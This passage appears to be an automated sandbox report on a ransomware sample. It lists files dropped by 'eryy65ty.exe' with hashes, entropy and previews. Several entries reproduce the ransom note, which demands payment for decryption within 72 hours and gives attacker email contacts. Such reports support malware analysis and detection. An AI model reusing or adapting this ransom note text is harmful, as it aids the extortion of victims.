                                                                                                    Preview:.e4..v.[8...;.4.`..#...r.....]....x.|o..~.j.l]....W..5..Y1E..K...~..G%.@....%F.7.G..IR.8.n..P..*.....h>.......{o+!.2*...b.$.....>Z.$./..Q.2.$.... qW.).B.>=..P.1.?....MS.c.a.3HT..a.f..k..N..H.$..3.{4..C..X./<."l .x.ic.p .5...y....._$.L#>{?#...N..........Q.].H.7...^..@.3.z...-...=~..j.k..,..=F..\.h..I<O....t....1RO.2=....{...,...ALc.U.Jr`.k..Z.H.g....m..NE.q?.....\j.s..VX.BO..~............Z..._.y...2..c.G..[_..}2t..3....m7..>w...5i3..kd=..V[./..........h4...A...."?.....~.J.#..V..{...V....t..uo...f.....u-]..5?...Z.+,..2..w[.p).[......M.R.vj..2*.Oj.6.:vj>.@7..2.r.'..s.F..Z...7...[.A..[I1.).2..,.5..K.%...c."..B.......m.LU....K.'.n..q..S+p.i...H..-...uUsC"y......~A.._...~.....]R2..Zy.{Awo!l....t...Kn....*.....t.........8.a.X..$...6.l3q.w(.^rM.|..h..Y.....*...6....t..I?..._.E|....W.*.F.r..*.s...3F.....n<qC.E;.(l.n<.<.+.*X..f.2_..g....."\0.B.]...q.y~D..r.....}...V~.\a..;..d.bl.....0.*x...[..7.9..6..[.t}..8s](...l.T..-.V.DI..,u.o0.r.F......{..V
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4719
                                                                                                    Entropy (8bit):7.9451135244677085
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:SN1gLndS6LZ82iYTKg0jjXLUW7v9JqYpCc2fLdaki7vtkXgq9SGOrZ:21gLn1Z82iYuN7vOO2jAZCwY8
                                                                                                    MD5:33C95B3AAB2ED2F028AB61D235774C35
                                                                                                    SHA1:D608A2391EFCE818BF1D0AFDA004999334CA1559
                                                                                                    SHA-256:F40CC560000DD736E3CD02753C76E4DAFDF320D6B605EDC8CB75D168BC7FBE61
                                                                                                    SHA-512:91ED4798539779E3E5155815C05F0F0A87D6BE9A3A85E3217196644A54C5086DEDE6BE2CF4E42234DBB3C727F01C2159FE55466D4D32FD5B19701A06720872C2
                                                                                                    Malicious:false
                                                                                                    Preview:.e4..v.[8...;.4.`..#...r.....]....x.|o..~.j.l]....W..5..Y1E..K...~..G%.@....%F.7.G..IR.8.n..P..*.....h>.......{o+!.2*...b.$.....>Z.$./..Q.2.$.... qW.).B.>=..P.1.?....MS.c.a.3HT..a.f..k..N..H.$..3.{4..C..X./<."l .x.ic.p .5...y....._$.L#>{?#...N..........Q.].H.7...^..@.3.z...-...=~..j.k..,..=F..\.h..I<O....t....1RO.2=....{...,...ALc.U.Jr`.k..Z.H.g....m..NE.q?.....\j.s..VX.BO..~............Z..._.y...2..c.G..[_..}2t..3....m7..>w...5i3..kd=..V[./..........h4...A...."?.....~.J.#..V..{...V....t..uo...f.....u-]..5?...Z.+,..2..w[.p).[......M.R.vj..2*.Oj.6.:vj>.@7..2.r.'..s.F..Z...7...[.A..[I1.).2..,.5..K.%...c."..B.......m.LU....K.'.n..q..S+p.i...H..-...uUsC"y......~A.._...~.....]R2..Zy.{Awo!l....t...Kn....*.....t.........8.a.X..$...6.l3q.w(.^rM.|..h..Y.....*...6....t..I?..._.E|....W.*.F.r..*.s...3F.....n<qC.E;.(l.n<.<.+.*X..f.2_..g....."\0.B.]...q.y~D..r.....}...V~.\a..;..d.bl.....0.*x...[..7.9..6..[.t}..8s](...l.T..-.V.DI..,u.o0.r.F......{..V
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):708
                                                                                                    Entropy (8bit):7.732169128327744
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:0hC5Q2CZ19ItGUhZEhVLHHsLz9O42P16SVgC7EDflJKaxnk4VPkMqK5kgF10/OW8:0xjWtGagVK9wVVtgDfHKCnkIP3igF1OM
                                                                                                    MD5:F7DB5A9FBDF7B89355624F10C1596463
                                                                                                    SHA1:0CDC824A6DECD4F6D04445AC487593779D5B393A
                                                                                                    SHA-256:6CF405A1D4A4B2F54ED5B22CDB1B39418F9EF4AA99F3C79553F20BFA8C05E923
                                                                                                    SHA-512:9038D3282ED062A5564B629B5136B26D6C987045F1503C507D39795188BD0B4B7262C5270DBF7552FD3F89C523D1C3FD23678CAA62AD333C8189089E966CCC67
                                                                                                    Malicious:true
                                                                                                    Preview:.......f.&Y|......7wYD."c.....YQ.j}^......e...!.....K....v.r..e.I. .........+P..](.X.|]..3.].9]Y.i.._..[..o...$..E7.....l E....N.a....@..j....K....z..<.N.@g..Z..I.R0...].e..2rx...nd".....u$D!/..o.Mi....T.;p..j1.r6.x.>Y.t.!..f[.[..S...0M=M.....^jC...........l...~....-..Gv{3.Z .OT...T\@.....>.0R...^..A..9...\hD...V..L3.i...s7c...`.ayk%3Y!A$.P.a..1....)....^..........9:.T..B.-...(.[.?=.oc.Y<..T..-.....!....EJ.81902c4b"}p...d....(.o...x..~].:1..{...W.h.Pc......C.H.p.E.......+...)....\i...]#7... .S.].:}a..q(.s..AO..o......n..,CU..{X.QwQ.>(j.G...4'......$(...F..m\a.e..<....\,n......O._a%.$..m.G..M.....9..?[....6.f.tE..q.:..I./a9....7.:....L.......w.Xn...}.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):708
                                                                                                    Entropy (8bit):7.732169128327744
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:0hC5Q2CZ19ItGUhZEhVLHHsLz9O42P16SVgC7EDflJKaxnk4VPkMqK5kgF10/OW8:0xjWtGagVK9wVVtgDfHKCnkIP3igF1OM
                                                                                                    MD5:F7DB5A9FBDF7B89355624F10C1596463
                                                                                                    SHA1:0CDC824A6DECD4F6D04445AC487593779D5B393A
                                                                                                    SHA-256:6CF405A1D4A4B2F54ED5B22CDB1B39418F9EF4AA99F3C79553F20BFA8C05E923
                                                                                                    SHA-512:9038D3282ED062A5564B629B5136B26D6C987045F1503C507D39795188BD0B4B7262C5270DBF7552FD3F89C523D1C3FD23678CAA62AD333C8189089E966CCC67
                                                                                                    Malicious:false
                                                                                                    Preview:.......f.&Y|......7wYD."c.....YQ.j}^......e...!.....K....v.r..e.I. .........+P..](.X.|]..3.].9]Y.i.._..[..o...$..E7.....l E....N.a....@..j....K....z..<.N.@g..Z..I.R0...].e..2rx...nd".....u$D!/..o.Mi....T.;p..j1.r6.x.>Y.t.!..f[.[..S...0M=M.....^jC...........l...~....-..Gv{3.Z .OT...T\@.....>.0R...^..A..9...\hD...V..L3.i...s7c...`.ayk%3Y!A$.P.a..1....)....^..........9:.T..B.-...(.[.?=.oc.Y<..T..-.....!....EJ.81902c4b"}p...d....(.o...x..~].:1..{...W.h.Pc......C.H.p.E.......+...)....\i...]#7... .S.].:}a..q(.s..AO..o......n..,CU..{X.QwQ.>(j.G...4'......$(...F..m\a.e..<....\,n......O._a%.$..m.G..M.....9..?[....6.f.tE..q.:..I./a9....7.:....L.......w.Xn...}.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15778
                                                                                                    Entropy (8bit):7.374972698015562
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:xeOnMBkrOA7/cMJWeLbL8u0QY/lwqMs/XNG6erZbhSNH+qGcSt5Y9fcxuZxjbik7:MlKlLt0QY/794doNMcSMhcoZ97
                                                                                                    MD5:6A8880F0660AF833D3788B09619EA9A9
                                                                                                    SHA1:C931D46B8AEFC46E8F65AA3476A81CB2A58558F2
                                                                                                    SHA-256:7C6259364D0B931F3FA5F9A3E52CA03F3FE3C30BF682B804921A59D68ADFCFEE
                                                                                                    SHA-512:923A52CCD363C8C1CF05A745BA17F3597C4FFFCA4F1B0509CC8E7F59B32008A23A1E64F23F599840E3A5BC5B8674986ACEA67A0ECB08715AE1328F07CD86B20B
                                                                                                    Malicious:true
                                                                                                    Preview:.).....q.OHp..x.z[..uf.x...."....c..Q8L.u..*8...Z.......;.x@2...E.0F.&.o..1....n+.{A.K.>..Q............T3..3....v.5^.(....-..e....j...Wp.].~............0,...XD..!T......r.}h)........U.f...?..u.r..._..x<....^.H......J>r...94\..F.n..j...xF,a.......Oc.u]..i:u6...00.:.=P.{T..\~.Y.-...Ky...+..%.C.N......N..m.>C.Z{-......ae.....fIV.y........`..s.0...$...IT,..Qi.$..q...=.`....M...[...[...~....R5V.MXs....~...|tw.j%.d...d.Nase^9...K$v....T.. ..*.R.T...W.`......J......S:......y<....lfse...."p.....k...x..ss..Y6..@P.a....h.......6.)..3}...]*.......!..nG.....).@|.RT..*..N.f..8.$.).9.{.-A......T...'.....1{u...rA.B.c.. ........=|X..m.-r.H.0..~...*.*.l..V.........=C=....=..>X..*>.......,...r.m.0....kc.(..'....*|R8..;.}...8"Q....SK5.3......6..DU..zl.HoJyi.8..-.A.m..A...N.=-...TL...g...o.....2...{.$.Y.86:.......;.=c..Uam.$.p."..$...$.....].N.....fKD..}..~.J...<.....f......Sg;....,.C..5):I....._W..5C.X.Z.K.u.......e.;..z.....wt.......sO4.\L.l.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15778
                                                                                                    Entropy (8bit):7.374972698015562
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:xeOnMBkrOA7/cMJWeLbL8u0QY/lwqMs/XNG6erZbhSNH+qGcSt5Y9fcxuZxjbik7:MlKlLt0QY/794doNMcSMhcoZ97
                                                                                                    MD5:6A8880F0660AF833D3788B09619EA9A9
                                                                                                    SHA1:C931D46B8AEFC46E8F65AA3476A81CB2A58558F2
                                                                                                    SHA-256:7C6259364D0B931F3FA5F9A3E52CA03F3FE3C30BF682B804921A59D68ADFCFEE
                                                                                                    SHA-512:923A52CCD363C8C1CF05A745BA17F3597C4FFFCA4F1B0509CC8E7F59B32008A23A1E64F23F599840E3A5BC5B8674986ACEA67A0ECB08715AE1328F07CD86B20B
                                                                                                    Malicious:false
                                                                                                    Preview:.).....q.OHp..x.z[..uf.x...."....c..Q8L.u..*8...Z.......;.x@2...E.0F.&.o..1....n+.{A.K.>..Q............T3..3....v.5^.(....-..e....j...Wp.].~............0,...XD..!T......r.}h)........U.f...?..u.r..._..x<....^.H......J>r...94\..F.n..j...xF,a.......Oc.u]..i:u6...00.:.=P.{T..\~.Y.-...Ky...+..%.C.N......N..m.>C.Z{-......ae.....fIV.y........`..s.0...$...IT,..Qi.$..q...=.`....M...[...[...~....R5V.MXs....~...|tw.j%.d...d.Nase^9...K$v....T.. ..*.R.T...W.`......J......S:......y<....lfse...."p.....k...x..ss..Y6..@P.a....h.......6.)..3}...]*.......!..nG.....).@|.RT..*..N.f..8.$.).9.{.-A......T...'.....1{u...rA.B.c.. ........=|X..m.-r.H.0..~...*.*.l..V.........=C=....=..>X..*>.......,...r.m.0....kc.(..'....*|R8..;.}...8"Q....SK5.3......6..DU..zl.HoJyi.8..-.A.m..A...N.=-...TL...g...o.....2...{.$.Y.86:.......;.=c..Uam.$.p."..$...$.....].N.....fKD..}..~.J...<.....f......Sg;....,.C..5):I....._W..5C.X.Z.K.u.......e.;..z.....wt.......sO4.\L.l.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13006
                                                                                                    Entropy (8bit):6.048630186152059
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:9PQaDWEBPgYHPw3HbCb0bFb/R1bozHIHPPmt:9PZgYHPw3HbCb0bFb/RFu4P+t
                                                                                                    MD5:DF9453EAFBC51983C14ED3840FCA5932
                                                                                                    SHA1:82CF952E5649FA57E97A9DFFCCB18665FEE2B940
                                                                                                    SHA-256:C85479B00B850E8B6447AE331E74EB2D70DAEC636246FE69BB3CFCF4BED881CC
                                                                                                    SHA-512:50B1DCC91102527B98C627EE4E9A599695A8A5F4EA5641AA9007B8FA9F8E1A398189280423884E516681B22BA42D9365F9B1DA019E234304F27B3A926F0CBF05
                                                                                                    Malicious:true
                                                                                                    Preview:=....<2d....M:.I.>...6L.i..^."..H...v`FF..=.....6.9t.T.-.....l.....O5.D.....8z..n.f)S...Eg..............a~'.....S.=..S%..[.k.c,....r..*........i..leD..n.......n...F......B..w..8..P.0..f.z-8..'W.%.Lv~$.+..X.F.>VS...a.H...z.e.b.p?..;..W._g.O;.v;....5K@..nd..a....Fd..7.U;L..!..9.....2..T.A....Z....bJ.=.a%.....(...A..Q#.:.s....'..H......"..E{..Q.].e.....~W...$..<..4.S......9...y..y.\.2WOA......i..|._...J.......g+.......F&N.!.s).&....8..=._9...?....h.. .......D<f.p=..b...?2.Z.Zn.'....I.....6..........n..x.0(.LI.g...'..\/7.i.FL......2....g.b.M.!.pG&.......%.....!}K+.*..9.v.O..?..+HLc...9<........@ .b/...%.SM~..E.=.... ..j.*.&";?.aI......m.Z...T.F....s8gC.............._......C.c.T.5..>!.].E....!`3...%.2/5..u...IMg..{X....[.C......MI.j.....;.F.....0......8.......(.Lx.!...)..t....9...V.#Va.....6g.....Q6{..I....H7.L..n.k..=..=.%..&.b>B......G^\.5.......3D.`#s...A7N.K......T._..#..h.L..}.xN..<R.....".....O/....O..xXymTN^@....JF
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13006
                                                                                                    Entropy (8bit):6.048630186152059
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:9PQaDWEBPgYHPw3HbCb0bFb/R1bozHIHPPmt:9PZgYHPw3HbCb0bFb/RFu4P+t
                                                                                                    MD5:DF9453EAFBC51983C14ED3840FCA5932
                                                                                                    SHA1:82CF952E5649FA57E97A9DFFCCB18665FEE2B940
                                                                                                    SHA-256:C85479B00B850E8B6447AE331E74EB2D70DAEC636246FE69BB3CFCF4BED881CC
                                                                                                    SHA-512:50B1DCC91102527B98C627EE4E9A599695A8A5F4EA5641AA9007B8FA9F8E1A398189280423884E516681B22BA42D9365F9B1DA019E234304F27B3A926F0CBF05
                                                                                                    Malicious:false
                                                                                                    Preview:=....<2d....M:.I.>...6L.i..^."..H...v`FF..=.....6.9t.T.-.....l.....O5.D.....8z..n.f)S...Eg..............a~'.....S.=..S%..[.k.c,....r..*........i..leD..n.......n...F......B..w..8..P.0..f.z-8..'W.%.Lv~$.+..X.F.>VS...a.H...z.e.b.p?..;..W._g.O;.v;....5K@..nd..a....Fd..7.U;L..!..9.....2..T.A....Z....bJ.=.a%.....(...A..Q#.:.s....'..H......"..E{..Q.].e.....~W...$..<..4.S......9...y..y.\.2WOA......i..|._...J.......g+.......F&N.!.s).&....8..=._9...?....h.. .......D<f.p=..b...?2.Z.Zn.'....I.....6..........n..x.0(.LI.g...'..\/7.i.FL......2....g.b.M.!.pG&.......%.....!}K+.*..9.v.O..?..+HLc...9<........@ .b/...%.SM~..E.=.... ..j.*.&";?.aI......m.Z...T.F....s8gC.............._......C.c.T.5..>!.].E....!`3...%.2/5..u...IMg..{X....[.C......MI.j.....;.F.....0......8.......(.Lx.!...)..t....9...V.#Va.....6g.....Q6{..I....H7.L..n.k..=..=.%..&.b>B......G^\.5.......3D.`#s...A7N.K......T._..#..h.L..}.xN..<R.....".....O/....O..xXymTN^@....JF
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:PGP Secret Sub-key -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1816
                                                                                                    Entropy (8bit):7.8889939857749
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:CzsFhY1nF8RqEr0hUE3Yd387l94ZBYgC6BAdKRZnd42pl4djnlKj7r6zLBb5F1SR:CzQ6mqEr0c3NOk7nL4GUL55FSt
                                                                                                    MD5:6D15E79139D6DE056907B5543DD733CE
                                                                                                    SHA1:AC8CB1DFDDE4CC4683C0B5FBF3BBB4321A6184BB
                                                                                                    SHA-256:B6C455891318D540E2B4E38AC301DE3179AB0650F817388E1AD588DBD5DD47FC
                                                                                                    SHA-512:74073593E150499374EA4BC4572D27C5C329E53F1D01894880B697223D7FA22BE93911DA46E61986F1BEFD388FC23359FC285874E90B4FB55B3121AE0AE388E0
                                                                                                    Malicious:true
                                                                                                    Preview:..m..p.m.K.'.<..:...y2.h.n.q.U......I......)........./..T.{}...f....tvz.df..Wl.F}V.4}nt-C.E..X.../ ...H.X.`..c..+..O......c....W.<...^>0...d...%.9..NF<.$..f.'...r....[W.L.].......q...w..:.5G...<n.....P...uW.O.7Q..u$b..+....i...N.jL.W(.`w.I.yb...3&-h..`...H......>...P/.K.e..l.o.....F....b-X.[:.B.u..]z.*?..c....!.........9.|&.5`...%...;q.z..U..,../4x...|:....`....,.9...=..aSpl.Z...@..,_..+[NA?....F.c]...5../4...s...`.d.......,?..K.J..D2Q.4.{...;K.@... _0..:.g,...~.z=.....G.....}.S.H.?S;.=,.j......7.....:>3O.s..G.1....G.`..8F.|f>.........X..H.... g..|".9K.]E5.....i.....L..R;..7T....X..{..:5Z...{.a._..d.c...h.<N....9C.&...}I.j..9.Y.Y..<.#.^.t.OmL.._.".-.T...R..'.m6?.a.PB...6H.=..Co...WT..t/..D.y ..uj".Y.I..8........c.+.s.=.6.7......q.rT..M.M.M.w7>5.`$<x.t.ME.{..c...j...K.l.\;...TS..J.m.,...y...[.u...S~......+.-.@.Tj...D.+b^._..BBT..S~.......U.:.&,.q...V........q.....#"T.U....\..5..^N....p...BoL.p.}g.....S.....p}m.:.Li1..9..2.SKj.+."
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:PGP Secret Sub-key -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1816
                                                                                                    Entropy (8bit):7.8889939857749
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:CzsFhY1nF8RqEr0hUE3Yd387l94ZBYgC6BAdKRZnd42pl4djnlKj7r6zLBb5F1SR:CzQ6mqEr0c3NOk7nL4GUL55FSt
                                                                                                    MD5:6D15E79139D6DE056907B5543DD733CE
                                                                                                    SHA1:AC8CB1DFDDE4CC4683C0B5FBF3BBB4321A6184BB
                                                                                                    SHA-256:B6C455891318D540E2B4E38AC301DE3179AB0650F817388E1AD588DBD5DD47FC
                                                                                                    SHA-512:74073593E150499374EA4BC4572D27C5C329E53F1D01894880B697223D7FA22BE93911DA46E61986F1BEFD388FC23359FC285874E90B4FB55B3121AE0AE388E0
                                                                                                    Malicious:false
                                                                                                    Preview:..m..p.m.K.'.<..:...y2.h.n.q.U......I......)........./..T.{}...f....tvz.df..Wl.F}V.4}nt-C.E..X.../ ...H.X.`..c..+..O......c....W.<...^>0...d...%.9..NF<.$..f.'...r....[W.L.].......q...w..:.5G...<n.....P...uW.O.7Q..u$b..+....i...N.jL.W(.`w.I.yb...3&-h..`...H......>...P/.K.e..l.o.....F....b-X.[:.B.u..]z.*?..c....!.........9.|&.5`...%...;q.z..U..,../4x...|:....`....,.9...=..aSpl.Z...@..,_..+[NA?....F.c]...5../4...s...`.d.......,?..K.J..D2Q.4.{...;K.@... _0..:.g,...~.z=.....G.....}.S.H.?S;.=,.j......7.....:>3O.s..G.1....G.`..8F.|f>.........X..H.... g..|".9K.]E5.....i.....L..R;..7T....X..{..:5Z...{.a._..d.c...h.<N....9C.&...}I.j..9.Y.Y..<.#.^.t.OmL.._.".-.T...R..'.m6?.a.PB...6H.=..Co...WT..t/..D.y ..uj".Y.I..8........c.+.s.=.6.7......q.rT..M.M.M.w7>5.`$<x.t.ME.{..c...j...K.l.\;...TS..J.m.,...y...[.u...S~......+.-.@.Tj...D.+b^._..BBT..S~.......U.:.&,.q...V........q.....#"T.U....\..5..^N....p...BoL.p.}g.....S.....p}m.:.Li1..9..2.SKj.+."
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1890
                                                                                                    Entropy (8bit):7.913470528846568
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:m+MOL0M3fMwWGNN22yJzY0w/mEWeQBWCV5dfC:9ZLdfKGNN224zNEP
                                                                                                    MD5:ABF0848AAFA0AD9D26ABA6497C9BA8E9
                                                                                                    SHA1:F8B3005A1998518A525057662F5705E6EE008DD4
                                                                                                    SHA-256:28760F396717DE92F82B420AA9B313DE4AEFB275B14A7D49251B2F0140B14EBD
                                                                                                    SHA-512:90F74CAAEE7BEC416CE84019C844D09ED25459F22AEABDAF284DC752D2C42C0F643069BE55176250734C49273EDE2AAA135A75D52A426B74ECBC510EB62B35E3
